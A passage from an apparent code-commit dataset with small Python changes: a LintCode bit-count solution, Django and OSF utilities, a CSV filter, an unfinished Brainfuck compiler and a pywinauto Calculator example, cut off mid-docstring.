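    if tmp.startswith('```'):
        # any fence marker toggles in/out of a code block,
        # covering '```python\n' and '``` \n' as well
        flag = not flag
        data += tmp
        continue

The hardcoded mtime bounds in traverse() are likewise one-off values tied to the author's run and would need adjusting for any other use.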
fc2a3635a37cd1dcfc2ea8705e2cae37b083b6a2
|
lintcode/Easy/181_Flip_Bits.py
|
lintcode/Easy/181_Flip_Bits.py
|
class Solution:
"""
@param a, b: Two integer
return: An integer
"""
def bitSwapRequired(self, a, b):
# write your code here
return bin((a^b) & 0xffffffff).count('1')
|
Add solution to lintcode problem 181
|
Add solution to lintcode problem 181
|
Python
|
mit
|
Rhadow/leetcode,Rhadow/leetcode,Rhadow/leetcode,Rhadow/leetcode
|
Add solution to lintcode problem 181
|
class Solution:
"""
@param a, b: Two integer
return: An integer
"""
def bitSwapRequired(self, a, b):
# write your code here
return bin((a^b) & 0xffffffff).count('1')
|
<commit_before><commit_msg>Add solution to lintcode problem 181<commit_after>
|
class Solution:
"""
@param a, b: Two integer
return: An integer
"""
def bitSwapRequired(self, a, b):
# write your code here
return bin((a^b) & 0xffffffff).count('1')
|
Add solution to lintcode problem 181class Solution:
"""
@param a, b: Two integer
return: An integer
"""
def bitSwapRequired(self, a, b):
# write your code here
return bin((a^b) & 0xffffffff).count('1')
|
<commit_before><commit_msg>Add solution to lintcode problem 181<commit_after>class Solution:
"""
@param a, b: Two integer
return: An integer
"""
def bitSwapRequired(self, a, b):
# write your code here
return bin((a^b) & 0xffffffff).count('1')
|
|
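Why the & 0xffffffff mask in the solution above matters: Python integers are arbitrary-precision, so when a ^ b is negative there is no fixed-width two's-complement word to count bits in — bin() just prints a signed form. Masking to 32 bits pins the result to the word size the problem assumes. A quick interpreter check:

    a, b = 1, -1
    print(bin(a ^ b))                            # '-0b10': signed form, not countable
    print(bin((a ^ b) & 0xffffffff))             # '0b1111...10': the 32-bit view
    print(bin((a ^ b) & 0xffffffff).count('1'))  # 31 bits need flipping

Each set bit of the masked XOR is exactly one position where a and b disagree.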
74ac965c451f29faa344be0161ebb419395faa6e
|
entities/context_processors.py
|
entities/context_processors.py
|
from . import models
from django.conf import settings
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.count,
'group_count': models.Group.objects.count
}
|
from . import models
from django.conf import settings
from django.contrib.auth import hashers
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.exclude(user__password__startswith=hashers.UNUSABLE_PASSWORD_PREFIX).count,
'group_count': models.Group.objects.count
}
|
Exclude unusable users from stats
|
Exclude unusable users from stats
|
Python
|
agpl-3.0
|
stadtgestalten/stadtgestalten,stadtgestalten/stadtgestalten,stadtgestalten/stadtgestalten
|
from . import models
from django.conf import settings
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.count,
'group_count': models.Group.objects.count
}
Exclude unusable users from stats
|
from . import models
from django.conf import settings
from django.contrib.auth import hashers
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.exclude(user__password__startswith=hashers.UNUSABLE_PASSWORD_PREFIX).count,
'group_count': models.Group.objects.count
}
|
<commit_before>from . import models
from django.conf import settings
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.count,
'group_count': models.Group.objects.count
}
<commit_msg>Exclude unusable users from stats<commit_after>
|
from . import models
from django.conf import settings
from django.contrib.auth import hashers
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.exclude(user__password__startswith=hashers.UNUSABLE_PASSWORD_PREFIX).count,
'group_count': models.Group.objects.count
}
|
from . import models
from django.conf import settings
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.count,
'group_count': models.Group.objects.count
}
Exclude unusable users from statsfrom . import models
from django.conf import settings
from django.contrib.auth import hashers
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.exclude(user__password__startswith=hashers.UNUSABLE_PASSWORD_PREFIX).count,
'group_count': models.Group.objects.count
}
|
<commit_before>from . import models
from django.conf import settings
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.count,
'group_count': models.Group.objects.count
}
<commit_msg>Exclude unusable users from stats<commit_after>from . import models
from django.conf import settings
from django.contrib.auth import hashers
def groups(request):
return {
'about_group': models.Group.objects.filter(id=settings.ABOUT_GROUP_ID).first(),
'all_sidebar_groups': models.Group.objects.scored().order_by('-score'),
}
def statistics(request):
return {
'gestalt_count': models.Gestalt.objects.exclude(user__password__startswith=hashers.UNUSABLE_PASSWORD_PREFIX).count,
'group_count': models.Group.objects.count
}
|
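For context on the fix above: Django marks accounts without a usable password by storing a pseudo-hash that begins with hashers.UNUSABLE_PASSWORD_PREFIX ('!'), typically followed by random padding, so a startswith filter is enough to exclude them. A small illustration against the stock auth User model (the username is illustrative):

    from django.contrib.auth import hashers
    from django.contrib.auth.models import User

    u = User(username='ghost')
    u.set_unusable_password()
    # the stored value looks like '!<random chars>', never a real hash
    assert u.password.startswith(hashers.UNUSABLE_PASSWORD_PREFIX)
    assert not u.has_usable_password()

The project's Gestalt model wraps the user, hence the user__password__startswith lookup rather than a direct password filter.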
60b7935b1848de5675601d64fc78909a557684ae
|
osf/management/commands/add_egap_registration_schema.py
|
osf/management/commands/add_egap_registration_schema.py
|
# -*- coding: utf-8 -*-
import logging
from django.core.management.base import BaseCommand
from osf.models import RegistrationSchema
from website.project.metadata.schemas import ensure_schema_structure, from_json
logger = logging.getLogger(__name__)
class Command(BaseCommand):
"""Add egap-registration schema to the db.
For now, doing this outside of a migration so it can be individually added to
a staging environment for preview.
"""
def handle(self, *args, **options):
egap_registration_schema = ensure_schema_structure(from_json('egap-registration.json'))
schema_obj, created = RegistrationSchema.objects.update_or_create(
name=egap_registration_schema['name'],
schema_version=egap_registration_schema.get('version', 1),
defaults={
'schema': egap_registration_schema,
}
)
if created:
logger.info('Added schema {} to the database'.format(egap_registration_schema['name']))
|
Add a management command for adding egap registration schema.
|
Add a management command for adding egap registration schema.
|
Python
|
apache-2.0
|
felliott/osf.io,mattclark/osf.io,saradbowman/osf.io,aaxelb/osf.io,cslzchen/osf.io,baylee-d/osf.io,felliott/osf.io,Johnetordoff/osf.io,adlius/osf.io,mfraezz/osf.io,brianjgeiger/osf.io,adlius/osf.io,adlius/osf.io,brianjgeiger/osf.io,saradbowman/osf.io,Johnetordoff/osf.io,pattisdr/osf.io,baylee-d/osf.io,aaxelb/osf.io,pattisdr/osf.io,felliott/osf.io,brianjgeiger/osf.io,Johnetordoff/osf.io,mattclark/osf.io,baylee-d/osf.io,CenterForOpenScience/osf.io,CenterForOpenScience/osf.io,cslzchen/osf.io,cslzchen/osf.io,mfraezz/osf.io,adlius/osf.io,Johnetordoff/osf.io,pattisdr/osf.io,aaxelb/osf.io,felliott/osf.io,CenterForOpenScience/osf.io,mfraezz/osf.io,brianjgeiger/osf.io,mfraezz/osf.io,mattclark/osf.io,CenterForOpenScience/osf.io,cslzchen/osf.io,aaxelb/osf.io
|
Add a management command for adding egap registration schema.
|
# -*- coding: utf-8 -*-
import logging
from django.core.management.base import BaseCommand
from osf.models import RegistrationSchema
from website.project.metadata.schemas import ensure_schema_structure, from_json
logger = logging.getLogger(__name__)
class Command(BaseCommand):
"""Add egap-registration schema to the db.
For now, doing this outside of a migration so it can be individually added to
a staging environment for preview.
"""
def handle(self, *args, **options):
egap_registration_schema = ensure_schema_structure(from_json('egap-registration.json'))
schema_obj, created = RegistrationSchema.objects.update_or_create(
name=egap_registration_schema['name'],
schema_version=egap_registration_schema.get('version', 1),
defaults={
'schema': egap_registration_schema,
}
)
if created:
logger.info('Added schema {} to the database'.format(egap_registration_schema['name']))
|
<commit_before><commit_msg>Add a management command for adding egap registration schema.<commit_after>
|
# -*- coding: utf-8 -*-
import logging
from django.core.management.base import BaseCommand
from osf.models import RegistrationSchema
from website.project.metadata.schemas import ensure_schema_structure, from_json
logger = logging.getLogger(__name__)
class Command(BaseCommand):
"""Add egap-registration schema to the db.
For now, doing this outside of a migration so it can be individually added to
a staging environment for preview.
"""
def handle(self, *args, **options):
egap_registration_schema = ensure_schema_structure(from_json('egap-registration.json'))
schema_obj, created = RegistrationSchema.objects.update_or_create(
name=egap_registration_schema['name'],
schema_version=egap_registration_schema.get('version', 1),
defaults={
'schema': egap_registration_schema,
}
)
if created:
logger.info('Added schema {} to the database'.format(egap_registration_schema['name']))
|
Add a management command for adding egap registration schema.# -*- coding: utf-8 -*-
import logging
from django.core.management.base import BaseCommand
from osf.models import RegistrationSchema
from website.project.metadata.schemas import ensure_schema_structure, from_json
logger = logging.getLogger(__name__)
class Command(BaseCommand):
"""Add egap-registration schema to the db.
For now, doing this outside of a migration so it can be individually added to
a staging environment for preview.
"""
def handle(self, *args, **options):
egap_registration_schema = ensure_schema_structure(from_json('egap-registration.json'))
schema_obj, created = RegistrationSchema.objects.update_or_create(
name=egap_registration_schema['name'],
schema_version=egap_registration_schema.get('version', 1),
defaults={
'schema': egap_registration_schema,
}
)
if created:
logger.info('Added schema {} to the database'.format(egap_registration_schema['name']))
|
<commit_before><commit_msg>Add a management command for adding egap registration schema.<commit_after># -*- coding: utf-8 -*-
import logging
from django.core.management.base import BaseCommand
from osf.models import RegistrationSchema
from website.project.metadata.schemas import ensure_schema_structure, from_json
logger = logging.getLogger(__name__)
class Command(BaseCommand):
"""Add egap-registration schema to the db.
For now, doing this outside of a migration so it can be individually added to
a staging environment for preview.
"""
def handle(self, *args, **options):
egap_registration_schema = ensure_schema_structure(from_json('egap-registration.json'))
schema_obj, created = RegistrationSchema.objects.update_or_create(
name=egap_registration_schema['name'],
schema_version=egap_registration_schema.get('version', 1),
defaults={
'schema': egap_registration_schema,
}
)
if created:
logger.info('Added schema {} to the database'.format(egap_registration_schema['name']))
|
|
cf1d9fceb5b929a9f96acf7d0dca270109659e84
|
scripts/filter_csv.py
|
scripts/filter_csv.py
|
#!/usr/bin/env python3
import os
import sys
import logging
import csv
import argparse
from signal import signal, SIGPIPE, SIG_DFL
logger = logging.getLogger()
signal(SIGPIPE, SIG_DFL)
def unidentified_states(item):
value = item.get('State', None)
return (value is None or (len(value) > 2 and value.strip() != "National"))
def no_title(item):
value = item.get('Title', None)
return value == '' or value is None
def no_group(item):
value = item.get('Group name', None)
return value == '' or value is None
def multiple_categories(item):
value = item.get('Category', '')
value_list = value.split(',')
return (len(value_list) > 1)
def main(args):
filter_name = getattr(args, 'filter', None)
filter_func = None
if filter_name == 'ufo-states':
filter_func = unidentified_states
elif filter_name == 'no-title':
filter_func = no_title
elif filter_name == 'no-group':
filter_func = no_group
elif filter_name == 'multi-cat':
filter_func = multiple_categories
reader = csv.DictReader(args.infile)
fieldnames = reader.fieldnames
filtered_items = filter(filter_func, reader) if filter_func else (r for r in reader)
writer = csv.DictWriter(sys.stdout, fieldnames)
writer.writeheader()
for item in filtered_items:
writer.writerow(item)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Searches a CSV file for.. stuff')
parser.add_argument('infile', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='Path to the CSV file to search on')
parser.add_argument('filter', type=str,
choices=('ufo-states', 'no-title', 'no-group', 'multi-cat'),
help='Specify a predefined filter to run on the CSV')
args = parser.parse_args()
main(args)
|
Add a script to filter a hallofjustice csv a few ways so we can find data quality issues prior to import.
|
Add a script to filter a hallofjustice csv a few ways so we can find data quality issues prior to import.
|
Python
|
bsd-3-clause
|
dmc2015/hall-of-justice,sunlightlabs/hall-of-justice,dmc2015/hall-of-justice,dmc2015/hall-of-justice,sunlightlabs/hall-of-justice,sunlightlabs/hall-of-justice
|
Add a script to filter a hallofjustice csv a few ways so we can find data quality issues prior to import.
|
#!/usr/bin/env python3
import os
import sys
import logging
import csv
import argparse
from signal import signal, SIGPIPE, SIG_DFL
logger = logging.getLogger()
signal(SIGPIPE, SIG_DFL)
def unidentified_states(item):
value = item.get('State', None)
return (value is None or (len(value) > 2 and value.strip() != "National"))
def no_title(item):
value = item.get('Title', None)
return value == '' or value is None
def no_group(item):
value = item.get('Group name', None)
return value == '' or value is None
def multiple_categories(item):
value = item.get('Category', '')
value_list = value.split(',')
return (len(value_list) > 1)
def main(args):
filter_name = getattr(args, 'filter', None)
filter_func = None
if filter_name == 'ufo-states':
filter_func = unidentified_states
elif filter_name == 'no-title':
filter_func = no_title
elif filter_name == 'no-group':
filter_func = no_group
elif filter_name == 'multi-cat':
filter_func = multiple_categories
reader = csv.DictReader(args.infile)
fieldnames = reader.fieldnames
filtered_items = filter(filter_func, reader) if filter_func else (r for r in reader)
writer = csv.DictWriter(sys.stdout, fieldnames)
writer.writeheader()
for item in filtered_items:
writer.writerow(item)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Searches a CSV file for.. stuff')
parser.add_argument('infile', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='Path to the CSV file to search on')
parser.add_argument('filter', type=str,
choices=('ufo-states', 'no-title', 'no-group', 'multi-cat'),
help='Specify a predefined filter to run on the CSV')
args = parser.parse_args()
main(args)
|
<commit_before><commit_msg>Add a script to filter a hallofjustice csv a few ways so we can find data quality issues prior to import.<commit_after>
|
#!/usr/bin/env python3
import os
import sys
import logging
import csv
import argparse
from signal import signal, SIGPIPE, SIG_DFL
logger = logging.getLogger()
signal(SIGPIPE, SIG_DFL)
def unidentified_states(item):
value = item.get('State', None)
return (value is None or (len(value) > 2 and value.strip() != "National"))
def no_title(item):
value = item.get('Title', None)
return value == '' or value is None
def no_group(item):
value = item.get('Group name', None)
return value == '' or value is None
def multiple_categories(item):
value = item.get('Category', '')
value_list = value.split(',')
return (len(value_list) > 1)
def main(args):
filter_name = getattr(args, 'filter', None)
filter_func = None
if filter_name == 'ufo-states':
filter_func = unidentified_states
elif filter_name == 'no-title':
filter_func = no_title
elif filter_name == 'no-group':
filter_func = no_group
elif filter_name == 'multi-cat':
filter_func = multiple_categories
reader = csv.DictReader(args.infile)
fieldnames = reader.fieldnames
filtered_items = filter(filter_func, reader) if filter_func else (r for r in reader)
writer = csv.DictWriter(sys.stdout, fieldnames)
writer.writeheader()
for item in filtered_items:
writer.writerow(item)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Searches a CSV file for.. stuff')
parser.add_argument('infile', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='Path to the CSV file to search on')
parser.add_argument('filter', type=str,
choices=('ufo-states', 'no-title', 'no-group', 'multi-cat'),
help='Specify a predefined filter to run on the CSV')
args = parser.parse_args()
main(args)
|
Add a script to filter a hallofjustice csv a few ways so we can find data quality issues prior to import.#!/usr/bin/env python3
import os
import sys
import logging
import csv
import argparse
from signal import signal, SIGPIPE, SIG_DFL
logger = logging.getLogger()
signal(SIGPIPE, SIG_DFL)
def unidentified_states(item):
value = item.get('State', None)
return (value is None or (len(value) > 2 and value.strip() != "National"))
def no_title(item):
value = item.get('Title', None)
return value == '' or value is None
def no_group(item):
value = item.get('Group name', None)
return value == '' or value is None
def multiple_categories(item):
value = item.get('Category', '')
value_list = value.split(',')
return (len(value_list) > 1)
def main(args):
filter_name = getattr(args, 'filter', None)
filter_func = None
if filter_name == 'ufo-states':
filter_func = unidentified_states
elif filter_name == 'no-title':
filter_func = no_title
elif filter_name == 'no-group':
filter_func = no_group
elif filter_name == 'multi-cat':
filter_func = multiple_categories
reader = csv.DictReader(args.infile)
fieldnames = reader.fieldnames
filtered_items = filter(filter_func, reader) if filter_func else (r for r in reader)
writer = csv.DictWriter(sys.stdout, fieldnames)
writer.writeheader()
for item in filtered_items:
writer.writerow(item)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Searches a CSV file for.. stuff')
parser.add_argument('infile', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='Path to the CSV file to search on')
parser.add_argument('filter', type=str,
choices=('ufo-states', 'no-title', 'no-group', 'multi-cat'),
help='Specify a predefined filter to run on the CSV')
args = parser.parse_args()
main(args)
|
<commit_before><commit_msg>Add a script to filter a hallofjustice csv a few ways so we can find data quality issues prior to import.<commit_after>#!/usr/bin/env python3
import os
import sys
import logging
import csv
import argparse
from signal import signal, SIGPIPE, SIG_DFL
logger = logging.getLogger()
signal(SIGPIPE, SIG_DFL)
def unidentified_states(item):
value = item.get('State', None)
return (value is None or (len(value) > 2 and value.strip() != "National"))
def no_title(item):
value = item.get('Title', None)
return value == '' or value is None
def no_group(item):
value = item.get('Group name', None)
return value == '' or value is None
def multiple_categories(item):
value = item.get('Category', '')
value_list = value.split(',')
return (len(value_list) > 1)
def main(args):
filter_name = getattr(args, 'filter', None)
filter_func = None
if filter_name == 'ufo-states':
filter_func = unidentified_states
elif filter_name == 'no-title':
filter_func = no_title
elif filter_name == 'no-group':
filter_func = no_group
elif filter_name == 'multi-cat':
filter_func = multiple_categories
reader = csv.DictReader(args.infile)
fieldnames = reader.fieldnames
filtered_items = filter(filter_func, reader) if filter_func else (r for r in reader)
writer = csv.DictWriter(sys.stdout, fieldnames)
writer.writeheader()
for item in filtered_items:
writer.writerow(item)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Searches a CSV file for.. stuff')
parser.add_argument('infile', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='Path to the CSV file to search on')
parser.add_argument('filter', type=str,
choices=('ufo-states', 'no-title', 'no-group', 'multi-cat'),
help='Specify a predefined filter to run on the CSV')
args = parser.parse_args()
main(args)
|
|
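Because infile is an optional positional defaulting to stdin and SIGPIPE is reset to its default handler, the script composes cleanly in shell pipelines. Hypothetical invocations (file names are illustrative):

    python3 filter_csv.py contacts.csv no-title > missing_titles.csv
    cat contacts.csv | python3 filter_csv.py multi-cat | head -20

argparse resolves the one-argument form correctly: with a single positional supplied, the optional infile keeps its stdin default and the required filter consumes the argument. Restoring the default SIGPIPE disposition is what keeps head from leaving a BrokenPipeError traceback.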
f5beda9ef523cc719d33bb3fd0f4deb349ff8cbd
|
bfcomp.py
|
bfcomp.py
|
import sys
import os
import subprocess
def compile(code):
output = """.section .bss
.lcomm mem, 8192
.set startidx, mem + 4096
.section .text
.global _start
_start:
movq $0, %r12
movq $startidx, %rbx
"""
code = ''.join(i for i in code if i in '.,[]+-<>')
loops = []
loopnum = 0
for i in code:
if i == '+':
output += " inc %r12\n"
elif i == '-':
output += " dec %r12\n"
elif i == '>':
output += " movq %r12, (%rbx)\n" \
" add $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '<':
output += " movq %r12, (%rbx)\n" \
" sub $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '[':
loopnum += 1
loops.append(loopnum)
output += " loop" + str(loopnum) + ":\n"
elif i == ']':
output += " cmp $0, %r12\n" \
" jnz loop" + str(loops.pop()) + '\n'
elif i == ',':
output += """
movq $0, %rax
movq $0, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
movq (%rbx), %r12
"""
elif i == '.':
output += """
movq %r12, (%rbx)
movq $1, %rax
movq $1, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
"""
return output
if __name__ == '__main__':
print("Compiling...")
with open(sys.argv[1]) as bffile:
output = compile(bffile.read())
name = os.path.splitext(sys.argv[1])[0]
with open(name + '.s', 'w') as asmfile:
asmfile.write(output)
print("Assembling...")
status = subprocess.call(['as', '-g', name+'.s', '-o', name+'.o'])
if status == 0:
print("Linking...")
subprocess.call(['ld', name+'.o', '-o', name])
|
Add not yet working compiler
|
Add not yet working compiler
|
Python
|
mit
|
ids1024/isbfc
|
Add not yet working compiler
|
import sys
import os
import subprocess
def compile(code):
output = """.section .bss
.lcomm mem, 8192
.set startidx, mem + 4096
.section .text
.global _start
_start:
movq $0, %r12
movq $startidx, %rbx
"""
code = ''.join(i for i in code if i in '.,[]+-<>')
loops = []
loopnum = 0
for i in code:
if i == '+':
output += " inc %r12\n"
elif i == '-':
output += " dec %r12\n"
elif i == '>':
output += " movq %r12, (%rbx)\n" \
" add $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '<':
output += " movq %r12, (%rbx)\n" \
" sub $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '[':
loopnum += 1
loops.append(loopnum)
output += " loop" + str(loopnum) + ":\n"
elif i == ']':
output += " cmp $0, %r12\n" \
" jnz loop" + str(loops.pop()) + '\n'
elif i == ',':
output += """
movq $0, %rax
movq $0, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
movq (%rbx), %r12
"""
elif i == '.':
output += """
movq %r12, (%rbx)
movq $1, %rax
movq $1, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
"""
return output
if __name__ == '__main__':
print("Compiling...")
with open(sys.argv[1]) as bffile:
output = compile(bffile.read())
name = os.path.splitext(sys.argv[1])[0]
with open(name + '.s', 'w') as asmfile:
asmfile.write(output)
print("Assembling...")
status = subprocess.call(['as', '-g', name+'.s', '-o', name+'.o'])
if status == 0:
print("Linking...")
subprocess.call(['ld', name+'.o', '-o', name])
|
<commit_before><commit_msg>Add not yet working compiler<commit_after>
|
import sys
import os
import subprocess
def compile(code):
output = """.section .bss
.lcomm mem, 8192
.set startidx, mem + 4096
.section .text
.global _start
_start:
movq $0, %r12
movq $startidx, %rbx
"""
code = ''.join(i for i in code if i in '.,[]+-<>')
loops = []
loopnum = 0
for i in code:
if i == '+':
output += " inc %r12\n"
elif i == '-':
output += " dec %r12\n"
elif i == '>':
output += " movq %r12, (%rbx)\n" \
" add $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '<':
output += " movq %r12, (%rbx)\n" \
" sub $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '[':
loopnum += 1
loops.append(loopnum)
output += " loop" + str(loopnum) + ":\n"
elif i == ']':
output += " cmp $0, %r12\n" \
" jnz loop" + str(loops.pop()) + '\n'
elif i == ',':
output += """
movq $0, %rax
movq $0, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
movq (%rbx), %r12
"""
elif i == '.':
output += """
movq %r12, (%rbx)
movq $1, %rax
movq $1, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
"""
return output
if __name__ == '__main__':
print("Compiling...")
with open(sys.argv[1]) as bffile:
output = compile(bffile.read())
name = os.path.splitext(sys.argv[1])[0]
with open(name + '.s', 'w') as asmfile:
asmfile.write(output)
print("Assembling...")
status = subprocess.call(['as', '-g', name+'.s', '-o', name+'.o'])
if status == 0:
print("Linking...")
subprocess.call(['ld', name+'.o', '-o', name])
|
Add not yet working compilerimport sys
import os
import subprocess
def compile(code):
output = """.section .bss
.lcomm mem, 8192
.set startidx, mem + 4096
.section .text
.global _start
_start:
movq $0, %r12
movq $startidx, %rbx
"""
code = ''.join(i for i in code if i in '.,[]+-<>')
loops = []
loopnum = 0
for i in code:
if i == '+':
output += " inc %r12\n"
elif i == '-':
output += " dec %r12\n"
elif i == '>':
output += " movq %r12, (%rbx)\n" \
" add $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '<':
output += " movq %r12, (%rbx)\n" \
" sub $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '[':
loopnum += 1
loops.append(loopnum)
output += " loop" + str(loopnum) + ":\n"
elif i == ']':
output += " cmp $0, %r12\n" \
" jnz loop" + str(loops.pop()) + '\n'
elif i == ',':
output += """
movq $0, %rax
movq $0, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
movq (%rbx), %r12
"""
elif i == '.':
output += """
movq %r12, (%rbx)
movq $1, %rax
movq $1, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
"""
return output
if __name__ == '__main__':
print("Compiling...")
with open(sys.argv[1]) as bffile:
output = compile(bffile.read())
name = os.path.splitext(sys.argv[1])[0]
with open(name + '.s', 'w') as asmfile:
asmfile.write(output)
print("Assembling...")
status = subprocess.call(['as', '-g', name+'.s', '-o', name+'.o'])
if status == 0:
print("Linking...")
subprocess.call(['ld', name+'.o', '-o', name])
|
<commit_before><commit_msg>Add not yet working compiler<commit_after>import sys
import os
import subprocess
def compile(code):
output = """.section .bss
.lcomm mem, 8192
.set startidx, mem + 4096
.section .text
.global _start
_start:
movq $0, %r12
movq $startidx, %rbx
"""
code = ''.join(i for i in code if i in '.,[]+-<>')
loops = []
loopnum = 0
for i in code:
if i == '+':
output += " inc %r12\n"
elif i == '-':
output += " dec %r12\n"
elif i == '>':
output += " movq %r12, (%rbx)\n" \
" add $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '<':
output += " movq %r12, (%rbx)\n" \
" sub $8, %rbx\n" \
" movq (%rbx), %r12\n"
elif i == '[':
loopnum += 1
loops.append(loopnum)
output += " loop" + str(loopnum) + ":\n"
elif i == ']':
output += " cmp $0, %r12\n" \
" jnz loop" + str(loops.pop()) + '\n'
elif i == ',':
output += """
movq $0, %rax
movq $0, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
movq (%rbx), %r12
"""
elif i == '.':
output += """
movq %r12, (%rbx)
movq $1, %rax
movq $1, %rdi
movq %rbx, %rsi
movq $1, %rdx
syscall
"""
return output
if __name__ == '__main__':
print("Compiling...")
with open(sys.argv[1]) as bffile:
output = compile(bffile.read())
name = os.path.splitext(sys.argv[1])[0]
with open(name + '.s', 'w') as asmfile:
asmfile.write(output)
print("Assembling...")
status = subprocess.call(['as', '-g', name+'.s', '-o', name+'.o'])
if status == 0:
print("Linking...")
subprocess.call(['ld', name+'.o', '-o', name])
|
|
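Why the commit message says "not yet working": as emitted, '[' produces only a label, so a loop body is never skipped when the current cell is already zero — the generated code has do-while semantics instead of brainfuck's while semantics — and no exit syscall is ever issued, so control falls off the end of _start. A sketch of corrected loop emission in the same style (illustrative, not the eventual fix):

    elif i == '[':
        loopnum += 1
        loops.append(loopnum)
        output += ("    cmp $0, %r12\n"
                   "    jz endloop{0}\n"   # skip the body when the cell is 0
                   "    loop{0}:\n").format(loopnum)
    elif i == ']':
        n = loops.pop()
        output += ("    cmp $0, %r12\n"
                   "    jnz loop{0}\n"     # repeat while the cell is nonzero
                   "    endloop{0}:\n").format(n)

plus an epilogue after the translation loop along the lines of movq $60, %rax / xorq %rdi, %rdi / syscall, i.e. exit(0) on x86-64 Linux.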
4642ffee61d48372041acf92b23793e995d3948b
|
examples/win10_calculator.py
|
examples/win10_calculator.py
|
"""
Example script for Calculator on Windows 10
Requirements:
- Windows 10
- pywinauto 0.6.1+
Win10 version of Calculator is very specific. A few different processes (!)
own different windows and controls, so the full hierarchy can be accessed
through the Desktop object only.
Minimized Calculator is a process in a "Suspended" state.
But it can be restored with a trick for the invisible main window.
"""
from pywinauto import Desktop, Application
app = Application(backend="uia").start('calc.exe')
dlg = Desktop(backend="uia").Calculator
dlg.type_keys('2*3=')
dlg.print_control_identifiers()
dlg.minimize()
Desktop(backend="uia").window(title='Calculator', visible_only=False).restore()
|
Add an example for Win10 version of Calculator.
|
Add an example for Win10 version of Calculator.
|
Python
|
bsd-3-clause
|
cetygamer/pywinauto,vasily-v-ryabov/pywinauto,pywinauto/pywinauto,drinkertea/pywinauto,MagazinnikIvan/pywinauto,airelil/pywinauto
|
Add an example for Win10 version of Calculator.
|
"""
Example script for Calculator on Windows 10
Requirements:
- Windows 10
- pywinauto 0.6.1+
Win10 version of Calculator is very specific. A few different processes (!)
own different windows and controls, so the full hierarchy can be accessed
through the Desktop object only.
Minimized Calculator is a process in a "Suspended" state.
But it can be restored with a trick for the invisible main window.
"""
from pywinauto import Desktop, Application
app = Application(backend="uia").start('calc.exe')
dlg = Desktop(backend="uia").Calculator
dlg.type_keys('2*3=')
dlg.print_control_identifiers()
dlg.minimize()
Desktop(backend="uia").window(title='Calculator', visible_only=False).restore()
|
<commit_before><commit_msg>Add an example for Win10 version of Calculator.<commit_after>
|
"""
Example script for Calculator on Windows 10
Requirements:
- Windows 10
- pywinauto 0.6.1+
Win10 version of Calculator is very specific. A few different processes (!)
own different windows and controls, so the full hierarchy can be accessed
through the Desktop object only.
Minimized Calculator is a process in a "Suspended" state.
But it can be restored with a trick for the invisible main window.
"""
from pywinauto import Desktop, Application
app = Application(backend="uia").start('calc.exe')
dlg = Desktop(backend="uia").Calculator
dlg.type_keys('2*3=')
dlg.print_control_identifiers()
dlg.minimize()
Desktop(backend="uia").window(title='Calculator', visible_only=False).restore()
|
Add an example for Win10 version of Calculator."""
Example script for Calculator on Windows 10
Requirements:
- Windows 10
- pywinauto 0.6.1+
Win10 version of Calculator is very specific. A few different processes (!)
own different windows and controls, so the full hierarchy can be accessed
